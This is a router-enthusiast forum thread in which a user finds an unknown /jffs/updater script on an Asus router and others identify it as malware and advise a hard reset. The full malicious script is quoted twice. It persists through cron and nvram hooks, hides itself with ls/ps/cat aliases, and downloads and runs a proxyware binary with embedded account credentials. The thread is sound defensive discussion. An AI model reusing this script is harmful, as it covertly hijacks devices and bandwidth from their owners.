What's new

Malware /jffs/updater script.

  • SNBForums Code of Conduct

    SNBForums is a community for everyone, no matter what their level of experience.

    Please be tolerant and patient of others, especially newcomers. We are all here to share and learn!

    The rules are simple: Be patient, be nice, be helpful or be gone!

Swistheater

Very Senior Member
What is this random /jffs/updater script?

Bash:
#!/bin/sh

if ls /jffs/p32
then
    exit
fi

cru a updater "* * * * * /jffs/updater"

nvram set vpn_server1_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server1_state | grep 2
then
    echo ""
else
    nvram set vpn_server1_state=2
    nvram set vpn_server1_nm=255.255.255.0
    nvram set vpn_server1_local=10.8.0.1
    nvram set vpn_server1_hmac=-1
    nvram set vpn_server1_errno=0
    nvram set vpn_server1_rgw=0
    nvram set vpn_server1_poll=0
    nvram set vpn_server1_reneg=-1
    nvram set vpn_server1_r1=192.168.1.50
    nvram set vpn_server1_r2=192.168.1.55
    nvram set vpn_server1_pdns=0
    nvram set vpn_server1_if=tun
    nvram set vpn_server1_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server1_remote=10.8.0.2
    nvram set vpn_server1_comp=yes
    nvram set vpn_server1_tls_keysize=0
    nvram set vpn_server1_firewall=auto
    nvram set vpn_server1_ccd=0
    nvram set vpn_server1_sn=10.8.0.0
    nvram set vpn_server1_digest=SHA1
    nvram set vpn_server1_c2c=0
    nvram set vpn_server1_state=2
    nvram set vpn_server1_crypt=tls
    nvram set vpn_server1_plan=1
    nvram set vpn_server1_ccd_excl=0
    nvram set vpn_server1_proto=udp
    nvram set vpn_server1_igncrt=0
    nvram set vpn_server1_cipher=AES-128-CBC
    nvram set vpn_server1_dhcp=1
    nvram set vpn_server1_port=31194
fi

nvram set vpn_server_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server_state | grep 2
then
    echo ""
else
    nvram set vpn_server_state=2
    nvram set vpn_server_nm=255.255.255.0
    nvram set vpn_server_local=10.8.0.1
    nvram set vpn_server_hmac=-1
    nvram set vpn_server_errno=0
    nvram set vpn_server_rgw=0
    nvram set vpn_server_poll=0
    nvram set vpn_server_reneg=-1
    nvram set vpn_server_r1=192.168.1.50
    nvram set vpn_server_r2=192.168.1.55
    nvram set vpn_server_pdns=0
    nvram set vpn_server_if=tun
    nvram set vpn_server_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server_remote=10.8.0.2
    nvram set vpn_server_comp=yes
    nvram set vpn_server_tls_keysize=0
    nvram set vpn_server_firewall=auto
    nvram set vpn_server_ccd=0
    nvram set vpn_server_sn=10.8.0.0
    nvram set vpn_server_digest=SHA1
    nvram set vpn_server_c2c=0
    nvram set vpn_server_state=2
    nvram set vpn_server_crypt=tls
    nvram set vpn_server_plan=1
    nvram set vpn_server_ccd_excl=0
    nvram set vpn_server_proto=udp
    nvram set vpn_server_igncrt=0
    nvram set vpn_server_cipher=AES-128-CBC
    nvram set vpn_server_dhcp=1
    nvram set vpn_server_port=31723
fi

nvram set jffs2_exec='ash /jffs/updater'
nvram set script_usbmount='ash /jffs/updater'
nvram set script_usbumount='ash /jffs/updater'

nvram commit

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

if ps | grep updateservice | grep -v grep
then
        echo "Running"
else
        if test -s /tmp/updateservice
        then
                echo " "
        else
        rm /tmp/updateservice
                if cat /proc/cpuinfo | grep -i ARMv7
                then
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli
                        chmod u+x /tmp/updateservice
                fi
        fi
        if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
                echo " "
        else
                rm /tmp/updateservice
                wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
                chmod u+x /tmp/updateservice
                if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
            echo " "
        else
            rm /tmp/updateservice
                    wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli
                    chmod u+x /tmp/updateservice
                    if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            then
                echo " "
            else
                rm /tmp/updateservice
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_aarch64/pawns-cli
                        chmod u+x /tmp/updateservice
                        /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            fi
        fi
        fi
fi

Code:
* * * * * /jffs/updater #updater#

@RMerlin is this a default script?
 
Last edited:
There have been a few other reports of this recently and RMerlin confirmed it was malware. Fortunately the router's asd process should stop the worst of it until such a time that you can perform the hard reset.
 
There have been a few other reports of this recently and RMerlin confirmed it was malware. Fortunately the router's asd process should stop the worst of it until such a time that you can perform the hard reset.
Should I reflash firmware after resetting?
 
I don't know how the malware gets onto the router but my guess is that a hard reset alone should be sufficient to get rid of it.
You were correct! Thanks so much for your value input. I was a little taken back when I saw CPU spikes and a script running in the background over wget to some unknown server. I hard reset all the routers on my network. Re-configured from scratch. It says the file had been there since the 5th of this month.
 
Good to hear you fixed it.

I suppose the bigger question is how it got onto the router in the first place. If we don't know that it's possible that it might come back again. Do you have any router services exposed to the internet, e.g. Web or SSH?
 
Good to hear you fixed it.

I suppose the bigger question is how it got onto the router in the first place. If we don't know that it's possible that it might come back again. Do you have any router services exposed to the internet, e.g. Web or SSH?
No. That is why it was so alarming because I don't even have my VPN services turned on ATM. Yet there is a script running "updates" on a VPN server.
 
@ColinTaylor

Would it be safe to block these on the firewall?

Code:
download.iproyal.com
proton.me

they are in the malware script above.
 
It says the file had been there since the 5th of this month.
Be careful with the date. 5th of May 2018 is the default date the router uses when it boots up before it's got the correct date from NTP. So many files have this timestamp.
 
Be careful with the date. 5th of May 2018 is the default date the router uses when it boots up before it's got the correct date from NTP. So many files have this timestamp.
actually it is may 2nd I read the wrong file but the date stamp is accurate.
 
This is a interesting thread. Being these routers are manufactured for China one has to wonder if there is some sort of data collection going on. After all China and the US are not on good terms right now. Remember the spy balloon crossing the US. Stange days indeed.
 
This is a interesting thread. Being these routers are manufactured for China one has to wonder if there is some sort of data collection going on. After all China and the US are not on good terms right now. Remember the spy balloon crossing the US. Stange days indeed.
There's nothing to suggest this has any connection to China. Looks like normal criminal malware.
 
Can this malware script run on Asuswrt as well or needs Asuswrt-Merlin?
 
Interesting subject, but how did this script end up on the router? Without user intervention, is it possible?

This link in the script points to Pawns.app (proxy service):

Code:
hxxps://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli

It seems to be a way to use internet bandwidth, explained here:

Code:
https://peppe8o.com/pawns-raspberry-pi-passive-income/

The email account, comes from this service (eg. also have vpn service):

Code:
https://proton.me/mail
 
What is this random /jffs/updater script?

Bash:
#!/bin/sh

if ls /jffs/p32
then
    exit
fi

cru a updater "* * * * * /jffs/updater"

nvram set vpn_server1_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server1_state | grep 2
then
    echo ""
else
    nvram set vpn_server1_state=2
    nvram set vpn_server1_nm=255.255.255.0
    nvram set vpn_server1_local=10.8.0.1
    nvram set vpn_server1_hmac=-1
    nvram set vpn_server1_errno=0
    nvram set vpn_server1_rgw=0
    nvram set vpn_server1_poll=0
    nvram set vpn_server1_reneg=-1
    nvram set vpn_server1_r1=192.168.1.50
    nvram set vpn_server1_r2=192.168.1.55
    nvram set vpn_server1_pdns=0
    nvram set vpn_server1_if=tun
    nvram set vpn_server1_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server1_remote=10.8.0.2
    nvram set vpn_server1_comp=yes
    nvram set vpn_server1_tls_keysize=0
    nvram set vpn_server1_firewall=auto
    nvram set vpn_server1_ccd=0
    nvram set vpn_server1_sn=10.8.0.0
    nvram set vpn_server1_digest=SHA1
    nvram set vpn_server1_c2c=0
    nvram set vpn_server1_state=2
    nvram set vpn_server1_crypt=tls
    nvram set vpn_server1_plan=1
    nvram set vpn_server1_ccd_excl=0
    nvram set vpn_server1_proto=udp
    nvram set vpn_server1_igncrt=0
    nvram set vpn_server1_cipher=AES-128-CBC
    nvram set vpn_server1_dhcp=1
    nvram set vpn_server1_port=31194
fi

nvram set vpn_server_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server_state | grep 2
then
    echo ""
else
    nvram set vpn_server_state=2
    nvram set vpn_server_nm=255.255.255.0
    nvram set vpn_server_local=10.8.0.1
    nvram set vpn_server_hmac=-1
    nvram set vpn_server_errno=0
    nvram set vpn_server_rgw=0
    nvram set vpn_server_poll=0
    nvram set vpn_server_reneg=-1
    nvram set vpn_server_r1=192.168.1.50
    nvram set vpn_server_r2=192.168.1.55
    nvram set vpn_server_pdns=0
    nvram set vpn_server_if=tun
    nvram set vpn_server_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server_remote=10.8.0.2
    nvram set vpn_server_comp=yes
    nvram set vpn_server_tls_keysize=0
    nvram set vpn_server_firewall=auto
    nvram set vpn_server_ccd=0
    nvram set vpn_server_sn=10.8.0.0
    nvram set vpn_server_digest=SHA1
    nvram set vpn_server_c2c=0
    nvram set vpn_server_state=2
    nvram set vpn_server_crypt=tls
    nvram set vpn_server_plan=1
    nvram set vpn_server_ccd_excl=0
    nvram set vpn_server_proto=udp
    nvram set vpn_server_igncrt=0
    nvram set vpn_server_cipher=AES-128-CBC
    nvram set vpn_server_dhcp=1
    nvram set vpn_server_port=31723
fi

nvram set jffs2_exec='ash /jffs/updater'
nvram set script_usbmount='ash /jffs/updater'
nvram set script_usbumount='ash /jffs/updater'

nvram commit

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

if ps | grep updateservice | grep -v grep
then
        echo "Running"
else
        if test -s /tmp/updateservice
        then
                echo " "
        else
        rm /tmp/updateservice
                if cat /proc/cpuinfo | grep -i ARMv7
                then
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli
                        chmod u+x /tmp/updateservice
                fi
        fi
        if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
                echo " "
        else
                rm /tmp/updateservice
                wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
                chmod u+x /tmp/updateservice
                if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
            echo " "
        else
            rm /tmp/updateservice
                    wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli
                    chmod u+x /tmp/updateservice
                    if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            then
                echo " "
            else
                rm /tmp/updateservice
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_aarch64/pawns-cli
                        chmod u+x /tmp/updateservice
                        /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            fi
        fi
        fi
fi

Code:
* * * * * /jffs/updater #updater#

@RMerlin is this a default script?
Wow. Did you just happen to find this sitting under the /jffs folder after noticing wget commands? Were you watching htop? How did you find it?
 

Similar threads

Latest threads

Support SNBForums w/ Amazon

If you'd like to support SNBForums, just use this link and buy anything on Amazon. Thanks!

Sign Up For SNBForums Daily Digest

Get an update of what's new every day delivered to your mailbox. Sign up here!
Top